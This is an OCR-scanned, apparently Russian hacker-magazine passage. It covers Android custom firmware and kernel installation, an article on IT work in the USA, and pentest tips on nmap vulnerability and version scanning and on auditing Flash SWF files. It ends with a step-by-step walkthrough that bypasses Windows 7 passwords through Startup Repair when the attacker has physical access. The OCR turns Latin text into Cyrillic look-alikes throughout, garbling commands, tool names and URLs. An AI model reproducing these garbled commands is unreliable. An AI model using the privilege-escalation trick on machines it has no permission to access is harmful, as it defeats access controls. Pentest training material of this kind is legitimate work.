Мы автоматизируем этот процесс с помощью приложения 
СооМападег. Для тех, кто не в курсе: еще с самого начала рас- 
пространения кастомных прошивок в Сети появился сайт до0о. 
ип. Изначально на нем размещался проприетарный гугловский 
софт (типа Стай или маркета), который авторы кастомных 
прошивок не могли использовать из-за лицензионных ограни- 
чений, но затем он превратился в открытый репозиторий все- 
возможных прошивок, аеще через некоторое время появилось 
приложение СооМападег, позволяющее автоматически уста- 
навливать как прошивки, так и гугловские приложения. 

Это приложение замечательно тем, что дает выбор из до- 
ступных прошивок, основываясь на модели смартфона. В ре- 
зультате нам не придется ни самостоятельно искать прошив- 
ки, ни бояться за то, что какая-то из них может криво встать. 
В общем и целом алгоритм работы с приложением выглядит 
так: «Запуск —› Вгоммзе СотранЫе ВОМ$ -› выбор прошивки 
по имени (например, аокр или ст) —> выбор версии -› Ведт 
Оомипюаа —› Огаег & Назй з@ежеа —› НазП». И это все, прошивка 
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СооМападег собственной персоной 


будет скачана, а затем установлена автоматически. Смартфон 
при этом перезагрузится. 

Установка или, если быть точным, доустановка приложений 
СооЧе производится еще проше: ВБомоаа дарр$ раскадез -»› 
\Уез —› Огаег & Яазй заеед. Хотя лучше, конечно же, скачать 
Сарр$ заранее, а лишь затем приступать к загрузке и установке 
прошивки. В таком случае на последнем шаге установки прошив- 
ки (Огаег & Назй заецщеа) появится возможность выбрать пакет 
даррз, и он будет установлен вместе с прошивкой. Установка 
сразу нескольких пакетов возможна только при наличии Т\М/АР 
Весо\уегу; в СюскмогКМоч эта функция заблокирована и работа- 
еттолько в сочетании с платной версией утилиты РОМ Мападег. 

Отмечу также, что по умолчанию СооМападег не делает 
вайп перед установкой прошивки, однако он это умеет. Поэтому 
каждый раз при кардинальной смене прошивки, то есть именно 
замене одной на другую, а не обновлении, в последнем окне 
(которое появляется после нажатия «Огаег & Назй заецеа») 
следует ставить флажок напротив опции «\Мре аза (Тастогу 
геза)». Так ты избежишь возможных проблем с загрузкой и ра- 
ботой новой прошивки. 


УСТАНОВКАЯДРА 
Кроме кастомной прошивки, мы также можем поставить ка- 
стомное ядро. О том, что это такое, мы уже подробно расска- 
зывали в одном из предыдущих номеров. Если в двух словах, 
то кастомное ядро может дать более тонкий контрольнад смарт- 
фоном, поднять его производительность и сохранить заряд 
батареи, однако здесь все далеко не так просто, как с прошив- 
ками, и без детального ознакомления с темой я бы не рекомен- 
довал прошивать кастомное ядро, а посоветовал ограничиться 
тем, которое идет в комплекте с прошивкой. 

Если же решение об установке ядра принято, то самое вре- 
мя заглянуть в Сооде Рау. Для многих популярных кастомных 
ядер в свое время были разработаны специальные утилиты 
для управления и обновления, с помощью которых установить 
ядро можно так же легко, как запустить почтовый клиент. Три из- 
вестные утилиты из этого списка: 

. Папсо.Кете| ирааег — «обновлятор» и конфигуратор од- 
ного из самых известных ядер для девайсов линейки Мехи$ 
(поддерживаются Затзипд Сааху Мехи$, 1@ Мехи$ 4, Азиз 
Соое Мехи$ 7 и Затзипа Мехиз$ 10). Бесплатная версия 
умеет только устанавливать и обновлять ядро, но большего 
нам и не нужно; 

. Тиобу Кете Тообох — аналогичное решение для ядра 
ТийпКу, поддерживающего все те же Мехиз-устройства, а так- 
же Затзипа Сааху Мще Пи Сааху $ Ш. Помимо функции 
установки, также включает в себя инструменты управления 
всеми функциями ядра и стоит 114 рублей; 
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Суапд)еНа позволяет скачатьновую 
версию Апагога, потратив всего 3 Мб 
трафика 


. С1а0о$ Сопто! — практически копия предыдущего прило- 
жения, но в этот раз для, прямо скажем, не самого популяр- 
ного ядра Са) О$ (Са!аху Мехиз$ и Мехи$ 7). Включает в себя 
полный комплект для тюнинга и автоматическую обновлял- 
ку. Стоит 81 рубль. 


Все эти приложения позволяют без лишних телодвижений 
установить одно из трех ядер. Но если деньги тратить не хо- 
чется или ты выбрал ядро, для которого просто нет управля- 
ющего приложения, то можно выйти из ситуации, скачав ядро 
прямо на телефон, а затем прошив его с помощью все того же 
СооМападег. Делается это так: 

1. Идем на ХВА (югит.хда-деуеюрег$.сот) или 4рда (4рда. 
ги), находим свой девайс, выбираем ядро (да, придется по- 
копаться в многочисленных тредах) и скачиваем его нателе- 
фон. Обычно ядро весит 5-10 Мб, поэтому ждать придется 
недолго и стоить это будет копейки (если нет \ММ-Р!. 

2. Устанавливаем и запускаем любой файловый менеджер, 
переходим в каталог Оомитоаа на карте памяти, находим ар- 
хив с ядром и копируем его в каталог доотападег, опять же 
в корне карты памяти. 

3. Запускаем СооМападег, жмем на пункт Разй РОМ5$, ставим 
галочку напротив архива с ядром, жмем кнопку «Огаег & Нап 
заецеа», а на следующем экране, ничего не меняя, нажи- 
маем кнопку Назп. 


ОБНОВЛЕНИЕ ПРОШИВКИ, ЯДРАИ САРР$ 

К этому моменту у тебя уже должны быть кастомная консоль 

восстановления, кастомная прошивка, приложения Сооде 

и кастомное ядро; фул-хаус, все, что только нужно. Однако 

долго на этом всем мы не просидим, и вскоре уже выйдут но- 

вые версии прошивок, основанные на новой версии Апаго, 
еще более быстрые ядра и еще более фичастые консоли вос- 
становления. Короче говоря, нужно обновляться. Но как? 

Для обновления также предусмотрены свои собственные 
инструменты, но перед тем, как перейти к их обзору, поясню 
несколько специфичных моментов: 

. Консоль восстановления можно обновлять когда угодно 
и как угодно. Она находится в отдельном разделе, поэто- 
му, даже угробив этот раздел, ты не угробишь Апаго. Об- 
новлять можно с помощью все тех же ВНесоуегу-Тоо!$, ВОМ 
Мападег и Т\М/ВР Мападег. 

. Ядро тоже находится в отдельном разделе, и его можно об- 
новлять/менять когда угодно и как угодно, главное — учиты- 
вать совместимость с версиями Апаго и типами прошивок. 
Способы описаны выше. 

. Обновляется прошивка без всяких вайпов, однако, если 
было установлено кастомное ядро, его придется пере- 


Весоуегу-Тоо!$: простой и удобный 
способ установки рекавери 


МЕО 


ТМАР Мападег 
позволяет выполнять 
практически 
все операции 
ТМ/АР Весоуегу 
прямо из Апагога: 
установку прошивок, 
вайп, бэкап 
и восстановление, 
перезагрузку 
в разных режимах. 
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Основные атрибуты 
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работы смартфона 


установить. Переустановка приложений Сооде не требу- 
ется. 

. Переход на другую прошивку производится с полным вай- 
пом (Тасогу гезе{) и последующей доустановкой приложе- 
ний Сооде и ядра. Все данные, кроме файлов на карте па- 
мяти, будут потеряны (этого можно избежать, сделав бэкап 
с помощью Нейит или ТКаптит Васкчр). 


Теперь о том, как выполнять обновление. Рекавери и ядро 
обновляются с помощью специализированного софта либо, 
в случае использования редкого ядра, самостоятельного ска- 
чивания и прошивки вручную, как показано в предыдущем 
разделе. Обновлять прошивки можно разными способами. 
Если прошивка была установлена с помощью СооМападег, 
то при появлении новой версии в репозитории доо.1т тебе при- 
дет уведомление, нажав на которое можно скачать и устано- 
вить новую версию. Никаких данных и приложений ты при этом 
не потеряешь, останется переустановить только ядро. 

В СуаподепМоча есть собственный механизм обновления, 
который также автоматически предупредит тебя о выходе но- 
вой версии и предложит скачать ее и установить. По умолчанию 
он работает только со стабильными версиями прошивки, но его 
можно переконфигурировать, так что предупреждения будут 
приходить и после выхода ночных сборок. Для этого идем в «На- 
стройки —> О телефоне -> Обновление СуаподепМос». В опции 
«Проверка обновлений» выбираем «Ежедневно», в опции «Тип 
обновления» — «Новые версии (Включая ночные сборки)». 

Единственная проблема такого метода обновления в том, 
что каждая прошивка будет весить около 200 Мб — накладно, 
если производить обновления каждый день или несколько раз 
внеделю. Поэтому я бы рекомендовал использовать инструмент 
СуапО)еКа, который позволяет выкачивать только патчи с изме- 
ненными компонентами прошивки вместо всего архива цели- 
ком. При использовании этого инструмента каждое обновление 
будет весить всего 2-10 Мб, так что для выкачивания подойдет 
даже сотовая сеть. Пользоваться очень просто: после первого 
запуска софтина предложит загрузить всю прошивку целиком 
(на нее в дальнейшем будут накладываться патчи), после чего 
повиснет в фоне и будет уведомлять о появлении обновлений. 


ПМЕО 

БЭКАП 
В прошивке Чтобы уберечь себя от возможной кривой установки прошив- 
АОКР есть масса ки, следует регулярно делать бэкап. Для этого существует два 
скрытых настроек, основных типа инструментов: приложения Нейит и Тцапит 
активировать ВасКир для бэкапа приложений, а также специальная функция 
которые можно, кастомных консолей восстановления под названием Мапаго. 
установив бесплатное Вторая отличается тем, что делает полный снимок всех ком- 


приложение АОКРсо. понентов смартфона так, что после любых действий смартфон 


можно будет вернуть к прежнему состоянию, включая все на- 
стройки, приложения, контакты и сообщения. 

Обычно бэкап Мапаго выполняется вручную прямо изменю 
кастомного рекавери, однако мы воспользуемся приложением 
Опшпе Мапагоа ВаскКир, которое создает резервную копию си- 
стемы прямо во время ее работы. Приложение это бесплатное 
и доступно в Сооде Р!ау. После установки оно установит скрипт 
бэкапа (это, кстати, придется делать после каждого обновле- 
ния прошивки) и предложит выполнить первоначальную на- 
стройку, которая сводится к выбору способа автогенерации 
имени бэкапа (по умолчанию текущее время), а также выбору 
формата бэкапа. Обычный СюскмогкКМоа-формат универсален 
и будет совместим с любым кастомным рекавери, однако если 
на смартфоне установлен именно СоскмогкМоч, то в опции 
Васкир Моде лучше выбрать С\ММ пстетеща!. В этом случае 
каждая новая резервная копия будет содержать только отличия 
от предыдущей, из-за чего потеряется совместимость с Т\М/ВР, 
но удастся сохранить солидный кусок свободного места на кар- 
те памяти. 

После того как все это будет сделано, достаточно нажать 
на кнопку Ошск Васкир, и приложение начнет свою работу. 
Смартфоном в это время вполне себе можно пользоваться, 
так что не стоит откладывать бэкап на вечер или другое время. 
По окончании процедуры софтина сама выведет на экран сооб- 
щение об успешном завершении резервирования и предложит 
просмотреть бэкап в приложении Мапаго Мападег. 

Последнее, в свою очередь, представляет собой инстру- 
мент управления имеющимися резервными копиями, просмо- 
тра их содержимого, восстановления, а также выборочного 
восстановления приложений, настроек, текстовых сообщений, 
логов разговоров, паролей от точек доступа \М-Н, рабочего 
стола, а также истории и паролей браузера. Все инструменты 
восстановления располагаются на вкладке «Восстановить дан- 
ные», и какие-либо пояснения по работе с приложением здесь 
не требуются. Все русифицировано и понятно даже ребенку. 


ВЫВОДЫ 

Сегодня процесс прошивки и кастомизации смартфона под 
управлением Апагоа — это уже не тот зубодробительный квест, 
каким он был во времена первых версий Апагога. Как ты смог 
заметить, все делается очень просто, без чтения длинных ма- 
нуалов и поиска совместимых прошивок. Но даже в том случае, 
если что-то пойдет не так, если ты окажешься столь невезучим, 
что запорешь не только установленный Апаго, но и консоль 
восстановления, Боф-сектор все равно останется на месте 
и ты сможешь вернуть свой смартфон к жизни, подключив его 
ккомпу и воспользовавшись фирменными инструментами про- 
шивки от производителя. 
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В ШТАТЫ 
НА РАБОТУ 
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«Быть в теме» и не знать английский язык — ситуация почти нереальная. На ан- 
глийском проводятся самые крутые конференции (как недавние Васк На+{ 

и ВЕР СОМ). Английский — язык для публикации научных статей и книг. Наан- 
глийском разговаривают специалисты из разных стран, если им предстоит со- 
трудничать или нужно обменяться опытом. И уж точно английский необходим, 
если ты хочешь поработать в самом центре событий мира 1Т — в Силиконовой 
долине. И именно об этом я хочу рассказать. 


БЕЗ АНГЛИЙСКОГО ПУТЬ ЗАКРЫТ 

Чтобы всего лишь попасть в список соискателей 
на более-менее престижную вакансию в США, 
простому айтишнику необходимо не только до- 
казать свою квалификацию (и подтвердить ее 
международными сертификатами по выбранной 
специализации — Мсго$ой, С1$со, Огафе, |Р| 
и так далее), но и продемонстрировать отличный 
английский. 

Кандидаты с недостаточным уровнем языка, 
скорее всего, столкнутся с серьезным разочаро- 
ванием. Поскольку список соискателей на одну 
позицию в Т-сфере огромен, всегда найдется 
не менее квалифицированный специалист с раз- 
говорным английским — сужу по собственному 
опыту работы в нью-йоркской П-компании. 


ВИЗА 
Помимо «подтягивания» уровня английского, 
потенциальному мигранту предстоит получить 
разрешение на работу в США. Наиболее распро- 
страненный вариант — получить визу категории 
Н1В, предназначенную для специалистов, кото- 
рых компания сама приглашает на работу. Чаще 
всего по этой визе въезжают программисты, 
сисадмины, специалисты по ИБ. 

Эта виза оформляется за счет работодателя, 
а процесс оформления занимает до полугода. 
Если на данные визы закончится квота, соис- 


кателю придется ждать следующего года. Надо 
отметить, что одним из этапов получения визы 
Н1В является собеседование по телефону — 
оно необходимо для определения уровня языка. 
В общем, способ долгий, хлопотный и требую- 
щий серьезного профессионального развития, 
но при этом наиболее надежный и реалистичный. 

Как вариант, можно перевестись из россий- 
ского в американское подразделение между- 
народной корпорации, получить приглашение 
от близкого родственника — гражданина США, 
выиграть грин-карту в ежегодной лотерее, всту- 
пить в брак или даже попросить политического 
убежища. 


ЗАРПЛАТЫ 

Допустим, ты все-таки нашел способ попасть 
в США. На какие же зарплаты можно рассчиты- 
вать? 

Одна из самых «выгодных» сфер в Т — ин- 
формационная безопасность. В частности, наи- 
большим спросом в США пользуются инженеры 
по ИБ и аналитики систем безопасности. Сред- 
няя зарплата в сфере ИБ в 2013 году составила 
95 000 долларов в год для рядовых сотрудников 
и 120 000 — для руководителей. 

Для сравнения: средняя зарплата во всей 
П-индустрии США составляет от 65 000 долла- 
ров для рядового сотрудника, а общая средняя 


' АНАСТАСИЯ ЛОМАЕВА 
< 


зарплата в Америке не превышает 50 000. Здесь 
уместно вспомнить, что средний оклад програм- 
миста в Москве — около 75 000 рублей в месяц, 
то есть по текущему курсу 27 000 долларов в год. 

Впрочем, не все так радужно — в США при- 
нято указывать зарплату до вычета налогов. Сум- 
марный уровень налоговых выплат составляет 
от 25% и сильно разнится от штата к штату, то 
есть 100 000 заработной платы означают около 
75 000 долларов реального дохода. 

Кроме того, при переезде тебе предло- 
жат зарплату ниже среднерыночной. Возмож- 
ность получить высококлассного специалиста 
за скромные деньги — главная причина, по ко- 
торой кадровые агентства активно ищут сотруд- 
ников за пределами США. И даже за эти деньги 
тебе придется жестко конкурировать с трудо- 
любивыми и невзыскательными соискателями 
из Китая. 


ВСЕРАВНО ПРОФИТ 

В общем, если после получения всех сертифи- 
катов, освоения английского на разговорном 
уровне и рассылки резюме по зарубежным ра- 
ботодателям ты так и не получишь заветное при- 
глашение, не опускай руки. С такими знаниями 
ты всегда сможешь как минимум удвоить свой 
доход и в нашей стране, при этом развивая рос- 
сийский [Т-рынок. \МЛп-\мп. 


Руководитель отдела по работе с персоналом компании ЕЪЕТ 


В 1999 году Анастасия Ломаева окончила международную школу при ООН в Нью-Йорке. В 2003 году по- 
лучила степень бакалавра по специальностям «Международный бизнес» и «НА-менеджмент» в универ- 
ситете Фордхэм. 
После окончания университета Анастасия устроилась специалистом по работе с персоналом в консалтин- 
говой [Т-компании №е{2$ на Уолл-Стрит. 
В 2006 году переехала в Россию для получения степени МВА по программе ОгепоЫе Сгадиа{е Эспоо! о? 
Визте$$ и Академии народного хозяйства при Правительстве РФ. 

В 2011 году Анастасия присоединилась к команде ЕЗЕТ Виза. 
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Алексей «Сгееп)од» Тюрин, 
ОтоНа! $есигИу 
адит4од@дтан.сот, 
мег. сот/атуийп 


НАЙТИ ИЗВЕСТНЫЕ УЯЗВИМОСТИ ДЛЯ СЕРВИСОВ, ОПРЕДЕЛЕННЫХ ММАР 


РЕШЕНИЕ 
Мпар стала одной из главных тулз при пентесте, особенно когда дело касает- 
Ся «первых шагов» — сбора информации о цели. Сканирование портов, опре- 
деление сервисов по их отпечаткам — все это активно используется. А сам 
движок Мтар внедрен во многих других продуктах, в том числе и в платных. 
Есть еще один важный момент: после внедрения в Мтар движка для вы- 
полнения М№М5ЗЕ-скриптов сообществом было разработано огромное количе- 
ство скриптов с самым разным функционалом. В результате Мтар из про- 
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Скрипт для поиска известных уязвимостей для Мтар 


сто сканера портов превратился в сканер уязвимостей (как-то странно это 
по-русски звучит :)). Напомню, МЗЕ — это такие скрипты на языке Шиа, ра- 
ботающие с библиотеками, описывающие разнообразные протоколы. С их 
помощью можно добавлять к сканеру различный функционал — от перебо- 
ра учеток к ЗММР до эксплуатации уязвимостей в СоаРизюп. 

Так вот, не так давно компания Зср АС (\м/мим.зср.сй) выложила еще 
один прикольный М$ЗЕ-скрипт — \ми!$сап. Суть его до невероятности проста. 
При сканировании Мтар с определением софта на сервисах скрипт берет 
название ПО (если оно было определено, конечно) и прогоняет его по базам 
уязвимостей: С\Е, ОЗ\УВО, с ЗесиуРоси$ и ЗесивУТгаскег, атакже по некое- 
му обобщению предыдущих — струи Ь. 

Поиск происходит локально (каждая база лежит в отдельном С\$-файле). 
Таким образом, мы можем узнать, есть ли в данном сервисе какие-то паблик- 
уязвимости. 

Пример на рисунке. Как можно заметить, там есть парочка Та!5$е-розЦме. 
Какая-то Мо7а... Это все следствие того, что скрипт производит просто по- 
иск подстроки в базе. Согласен — дубово :). 

С другой стороны, не раз сталкивался с ситуацией, когда по-быстренькому 
сканировалась какая-то сеть с кучей странных сервисов. И хорошо было бы 
сразу выискать самые лакомые кусочки. 

Для того чтобы заставить скрипт работать, надо его скачать с базами от- 
сюда: зсфр.сп/еп/?!а6$.20130625, ми $сап.пзе кинуть в зсйр{$ папки Мтар, 
а базы — в зспр{5/ии!$сап. Запускается либо обычным образом для МЗЕ- 
скриптов, либо в комплекте с -$С (так как относится к аеТаий и за!е модулям). 
Одна личная рекомендация — лучше выбирать конкретную базу (5срми а), 
иначе листинг может быть ооооочень большим. 


птар -$\/ --5сг1рЕ=\и15сап.пзе --зсг1р*-аг8$ «= 
ми15сапаб=$с1руи1а6.сзу -р465 Тагвее_1р 
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КОРРЕКТНО ОПРЕДЕЛИТЬ ВЕРСИИ ПО, ИСПОЛЬЗУЯ ММАР 


РЕШЕНИЕ 

Описывая решение предыдущей задачки, я вспомнил еще один вопрос, 
который меня когда-то интересовал и которым я хотел поделиться с тобой. 
А как же на деле Мтар определяет версии ПО на портах? В смысле, основ- 
ная концепция — посылать разные запросы и сверять ответы с имеющейся 
базой — вполне понятна и логична. Но вот когда сталкиваешься с реальны- 
ми сканами и видишь что-то типа «срмтарреа» или «Нр?», что с этим делать? 
Сюда же можно добавить и случающиеся «пропуски» (Та|5е педайм\е) каких- 
нибудь сервисов... На самом деле про эту тему можно было бы написать це- 
лую статью, но я постараюсь описать основные процессы и важные факты, 
которые помогут «приручить» Мтар. 

Итак, все начинается со сканирования портов. Порты отсканировались, 
и только на тех, что получили статус ореп или ореп |ЯКегеа, будут опреде- 
ляться сервисы (если был указан параметр -5\ или аналогичный). В случае 
если был статус ореп|ЯИегеа и сервис был определен, то статус меняется 
на ореп. Важно также, что процесс определения сервисов происходит па- 
раллельно для различных портов. 

Чтобы понимать алгоритм определения сервиса, нам надо познакомить- 
ся с двумя файлами, поставляемыми с Мтар’ом, — птар-зегмсез$ и птар- 
зегмсе-ргобез. Первый — это просто соотношение типов сервисов (ЕТР, 
НТТР, О№$) и портов. \Ме! Кпомп или типовые, так сказать. Большая часть 
взята из 1АМА (1024 первых порта). Данные из этого файла используются 
(частично) для третьего столбца (Зегмсе). 

Здесь же кроется и ответ на одну из распространенных проблем. Если 
в выводе Мтар’а указывается сервис со знаком вопроса (ПИр?, Ир?), то зна- 
чит, что Мтар даже не понял, какой там используется протокол/сервис. 
Это просто общее указание, что обычно там бывает такой-то сервис. Если 
же без знака вопроса, но без версии ПО, то, значит, не было информации 
о версии, но тип сервиса правильный (хотя доверять тут не следует, он мог 
и ошибиться). 

Дальше — второй файл. В нем описаны различные пробы (Ргобе$), кото- 
рые использует Мтар для определения версий ПО на портах. По сути, это 
просто некая последовательность данных, которые отправятся на сервис, 
а также набор гедехр’ов — правил к ним для того, чтобы парсить ответы. 
Если правило сработало, то версия, значит, определилась (и дальнейшее 
определение сервиса прекращается). 

Первая и основная проба (для протокола ТСР) — МИУШЕ. Она указывает 
то, что Мтар подключается к порту и ничего не посылает, а ждет 6 секунд 
ответных данных. Большинство сервисов, в особенности олдскульных (ЕТР, 
ЗМТР, $$Н), первыми посылают данные клиенту — некое приветствие. Во 
многом поэтому у МИЧ--пробы больше всего различных правил (регекспов). 
Подключились, подождали — получили данные. Если ответа никакого нет, 
используется следующая проба — СепепсИптез (\г\п\г\п). В данном случае 
данные уже отправляются на сервер и правила сверяются с полученным 
ответом. Важно еще отметить, что для ЧОР-скана отсутствует МИ -проба 
(из-за специфики протокола). 

Еще раз подчеркну, что к каждой пробе может быть любое количество 
правил. Вот пара примеров: 


С :\О5ек$\$ $ >2ппар -$09 —-р- -РМ —п 
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Определение версии ПО в Мтар 
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Как видишь, все просто. Сами правила (тасп) определяют сервис и стан- 
дартный гедехр (как в Реп), с помощью которого мы можем где надо вытащить 
версию, например. 

Но это все первая и простая часть. Далее чуть больше тонкостей. 
Во-первых, кроме простых правил, есть еще и «мягкие». Они начинают- 
ся с $0ИтаюсИ и подтверждают правильный выбор протокола. То есть 
как только срабатывает мягкое правило, в дальнейшем применяются толь- 
ко пробы для этого сервиса (протокола). Например, мягкое правило (какое 
словосочетание-то) для РОРЗ. 


5офтафсИ рор3З | ^\+0К -\^\_С(Ц)!, /+:<>@.\м 1+\г\и$ | 


При срабатывании этого правила не определяется версия ПО (потому 
они мягкие), но Мтар теперь не будет слать пробы, которые точно не по- 
дойдут (СЕТ / НТТР/1.1, например), что избавит нас от мусорного трафика. 
А будет использовать только подходящие для сервиса (Нер\и\п, например). 

Дальше несколько важных полей в файле птар-зегмсе-ргорбез. Для каж- 
дой пробы (кроме МИЦ.) указывается порт, на котором эта проба чаще всего 
срабатывает (точнее, где обычно висит сервис), а также «редкость» (гайу) 
этой пробы. Чем выше значение, тем оно реже. Возможны значения от 1 
до 9. Что еще важнее — значение по умолчанию 7, то есть ряд проб не ис- 
пользуются достаточно часто. 


Ргобе ТСР Не11о а|ЕНЁЬО\г\и | 


рогз 25,587,3025 | 
гаг1{фу 8 


Так, ну и последняя опция, которая, правда, скорее важна, если ты захо- 
чешь добавлять свои пробы, — Та!Баск. Она связывает различные правила 
проб между собой, чтобы не требовалось их повторять. По умолчанию у всех 
проб стоит привязка к МУЦ-пробе. Таким образом, когда посылается какая- 
то проба, ответ сначала проверяется правилами от самой пробы, а потом 
правилами от МИЕЕ. С помощью опции ТаБаск ты можешь сделать ссылку 
на другую пробу, чьи правила будут применены раньше МИЦ... 

И еще важный момент про пробы. Есть специальная проба для опреде- 
ления поддержки 5ЗЁ-сервисом. И если она проходит, то все пробы повто- 
ряются (включая МИШ.), но уже в обертке из 5$Ё-подключения. К тому же 
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7о Взлом 


в выводе в поле Зегусе добавляется указание о поддержке $1 (типа $$/ 
рор3З). Кстати, 551 — это как раз то, что определяется верно всегда. 

Итак, мы разобрали вводную часть и теперь можем корректно осознать, 
какие же пробы будут использованы. Во-первых, Мтар смотрит на порт, 
который тестируется, и выбирает все пробы, которые «часто» появляются 
на этом порту (значение рой$ из птар-зегмсе-ргобез$). Во-вторых, Мтар 
смотрит указанную при сканировании «интенсивность» детекта (оно же поле 
гагКу). Будут использованы только те пробы, чье значение меньше указан- 
ного или равно ему. То есть ЕНЕО из последнего примера будет использо- 
вана, несмотря на ее редкость, которая больше значения по умолчанию (7), 
но только на определенных портах (ЗМТР’шные порты — 25, 587, 3025). Те- 
перь, я думаю, кое-что стало понятно. И надеюсь, я нигде не напутал сильно. 

Несколько общих практических советов. Для начала надо вспомнить, 
что, имея дело с Мтар’ом, мы всегда выбираем некий компромисс между 
скоростью и глубиной. Потому даже некоторые веб-серверы на нестан- 
дартных портах иногда могут скрыться от сканирования по умолчанию, так 
как не все пробы используются. С другой стороны, если мы укажем пара- 
метр --уегзюп-Пат, который устанавливает интенсивность в значение 2, 
это даст нам, как ни странно, быстрые значения с достаточно хорошим по- 
крытием. 
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Если же говорить про проблемные порты, где ответ Мтар невнятен, 
то как минимум стоит применить --уегзюп-а|, указывающий использовать 
все пробы. Также сам Мтар, в случае, когда данные от сервиса получе- 
ны, а правила ни одни не подошли, выводит значения при сканировании. 
Это тоже хорошее место для анализа. При иных странностях (и если есть 
время) стоит использовать --уегзюоп-{гасе, который укажет нам, когда и ка- 
кое правило срабатывает (помогает, когда определен только тип сервиса, 
а версии нет). 

А, ну и вопрос, часто напрягающий, — видеть {срмтгарреа в графе \егзюп. 
Вообще, вики говорит, что 1ср\мгарреЯ — это некая тулза под *пх, которая 
позволяет АСЕ на подключения. При этом проверка происходит уже по- 
сле установки подключения, а потому порт открыт. Я лично их в реально- 
сти не видел, а вот с 1срмгарреа сталкиваюсь систематически. В общем, 
{срмтарреа — это спецправило Мтар, и срабатывает оно тогда, когда сервер 
обрывает подключение до того, как данные были отправлены. Не уверен, но, 
возможно, здесь может быть Та|5е-педануе от Мтар, из-за того что сервер 
разрывает подключение еще до окончания ожидания МИЧ-пробы в 6 се- 
кунд. А другие пробы и не запускаются. 

Надеюсь, что получилось понятно описать. Если есть вопросы, докумен- 


тация в помощь (4900.4/а44 Ши). 


АВТОМАТИЗИРОВАТЬ ПОИСК УЯЗВИМОСТЕЙ ЕЕАЗН-РОЛИКОВ 


РЕШЕНИЕ 
Хе-хей, в прошлый раз мы с тобой познакомились с возможной «небезопас- 
ностью» флеш-роликов. Чем больше фишек, тем и проблем с безопасностью 
больше. А флеш — он тот еще толстяк. Хотя надо сказать, что Адобе подкру- 
тила гайки и старые векторы атак уже не всегда работают в новых плеерах 
и с учетом функционала АсНоп5сиру 3. Но презентации последних лет двух 
показывают: те же Х$$ через флеш-ролики — это распространенная вещь, 
даже на защищенных сайтах. Вообще, я планировал расписать тему со спе- 
цифичными именно для флеша багами (а не обычные Х$5$), но хороших (ды- 
рявых) примеров пока не нашел. Так что сегодня мы возьмемся с другого 
конца — с метода поиска уязвимостей в роликах и автоматизации этого про- 
цесса. 

Итак, поиск. Первый метод — который мы обсуждать не будем :) — это 
фаззинг. Он вообще применим к роликам. Но мне кажется, что этим если 
и заниматься, то только как часть работы по сканированию веб-приложения, 
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где ролик используется. В смысле, здесь нужны другие тулзы, как, например, 
эм/Ипуезйааюг (ч00.9/Ата9), но процесс тот же. И, имхо, много не найдешь. 

Второй, более трудозатратный, основывается на том, что З\ММЕ — это 
ролик, который скачивается и исполняется на клиентской машине, то есть 
у нас. К тому же он представляет собой байт-код, а потому хорошо деком- 
пилируется. Декомпиляторов много, в том числе бесплатных. Пару лет назад 
были проблемы с декомпилятором под АЗЗ, но все исправилось. Мне лично 
по душе Зоптк МЕ Бесотриег, хотя он и платный (есть триал). Все, что даль- 
ше требуется, — посмотреть, есть ли какие-то входные параметры, а также 
может ли их модификация к чему-то привести. Первая часть дела делается 
очень быстро, вторая же зависит от толщины и функциональности ролика. 
Но по опыту — занимательные вещи достаточно быстро раскапываются. Все 
дело в том, что большинство вообще не подозревают, что ролики могут нести 
угрозу для безопасности, то есть основная наша задача — понять функционал 
ролика. 
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Декомпиляция в один клик Классические проверки на «безопасный» ЗМ/Е 


Еазу Наск 
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Ну и конечно, указанные еще в прошлый раз — группа опасных функций. 
Их тоже надо поискать. А так как это, по сути, поиск по тексту, то и тулзы 
есть нам в помощь. Например, ЗеагспОюоаку (аоо.9/ВТСУ?7). Это такой по- 
исковый комбайн, который изначально был нацелен на сбор информации 
из Сооде и Втд, но расширился и научился парсить метаинфу документов 
на приватную информацию (как тулза РОСА), искать по ЗПодапНО, а также 
декомпилить Назй-ролики и искать в них гедехр’ом опасные функции. Полу- 
чилось очень просто и лаконично: указываешь папку с роликами для анали- 


УТ 


за и правила, по которым будет производиться поиск, и все — основные 
косяки уже видны. 

Вторым помощником может оказаться более специализированная тул- 
за от НР — 5\ММЕ$сап (аоо.а/бЕАЛЕ). Это бесплатный декомпилятор для ЭММЕ 
на А$2, АЗЗ с кучкой «мозгов». Указываешь $\ММР’ ку, он ее подгружает и анали- 
зирует. По каждому найденному пункту он выводит описание «чем это плохо» 
и указывает место в исходниках, что очень полезно (хотя первый декомпиля- 
тор поюзабельней, имхо). Весь наборчик я приложу, так что попрактикуйся. 
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ПОДНЯТЬ ПРИВИЛЕГИИ В \ММО0\/$ ПРИ ФИЗИЧЕСКОМ ДОСТУПЕ К ХОСТУ 


РЕШЕНИЕ 

Недавно в блоге ще Соттз (900.91/51497) был опубликован прикольный 
метод поднятия привилегий в ОС \\Ипдом/$ 7 в том случае, когда у нас име- 
ется физический доступ к компу. Такой трюк специально для инсайдеров. 

Конечно, имея физический доступ, сделать это достаточно просто, но, 
с другой стороны, на предприятиях с этим стараются бороться: опечатыва- 
ют корпуса техники, устанавливают пароль на БИОС и на локального админа 
в винде, отключают загрузку с внешних девайсов. И втакой ситуации возмож- 
ности пентестера значительно ограничены. 

Так вот, этот метод обходит все названные ограничения, да и вообще 
оставляет лишь небольшое количество следов после себя. Все потому, 
что основывается он на фиче самой винды — восстановлении после сбо- 
ев (ЗузЗет Весоуегу). Сразу отмечу, что не стоит путать эту фишку с «без- 
опасным режимом» загрузки ОС (За е тоае), так как у второй для доступа 
к ОС необходимо ввести пароль от админа. А вот у Зу$4ет Весо\уегу такой 
проблемы нет. 

Кроме того, вызвать этот процесс очень просто. Необходимо некорректно 
вырубить винду — кнопкой «Везе» или <С + АК + Бе>. При загрузке систе- 
мы ОС поймет, что ее отключили неверно, и выведет на экран варианты за- 
грузки: 

‚ Зан\\Мпаом/5 Могтайу; 
._ [аипсИй Зацир Верах (гесоттепаеч). 


Я думаю, каждый из нас видел этот экран хоть раз в жизни. 
Выбираем З1атир Веран, и все! Дальше идут чистые СЧУ-хаки, для того 
чтобы добраться до файловой системы или консоли: 
1. Ждем подгрузки Зу$ет Весоуегу. 
2. На вопрос Вефоге уоигсотрщег изтда Зу$ет ВеЗоге отвечаем «Нет». 


3. В появившемся окне об отправке сообщения об ошибке выбираем Мем 
ргоБет а&аи$. 

4. Кликаем на одну из ссылок, откроется, например, Моерач. 

5. Из блокнота уже нет никаких ограничений. Через окно открытия файлов 
уже можно запустить и консоль, и проводник, чтобы бороздить просторы 
файловой системы ОС. 


